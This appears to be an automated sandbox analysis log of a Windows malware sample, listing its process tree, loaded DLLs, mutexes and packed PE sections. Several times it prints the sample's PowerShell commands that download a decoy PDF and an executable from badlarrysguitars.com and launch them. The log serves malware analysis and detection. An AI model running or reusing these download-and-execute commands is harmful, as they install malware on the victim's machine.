Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftyumdz4.2xi.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\lg1wwLsmCX.exe "C:\Users\user\Desktop\lg1wwLsmCX.exe"
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")Jump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: n.pdbbd\ source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000D.00000002.1635091622.00000236BB92E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{3050F24A-98B5-11CF-BB82-00AA00BDCE0B}\LocalServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1635969714.00000236BB9C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-11CF-BB82-00AA00BDCE0B}\InprocServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: powershell.exe, 0000000D.00000002.1635814582.00000236BB989000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")Jump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")Jump to behavior
Source: initial sampleStatic PE information: section where entry point is pointing to: T10B924G
Source: lg1wwLsmCX.exeStatic PE information: real checksum: 0x19cbc should be: 0x1e859
Source: lg1wwLsmCX.exeStatic PE information: section name: T10B924G
Source: lg1wwLsmCX.exeStatic PE information: section name: G8MCUXOZ
Source: lg1wwLsmCX.exeStatic PE information: section name: Z2TXZQUP
Source: lg1wwLsmCX.exeStatic PE information: section name: SRW4MTG9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF5FFA pushad ; retf 13_2_00007FF887CF5FFB
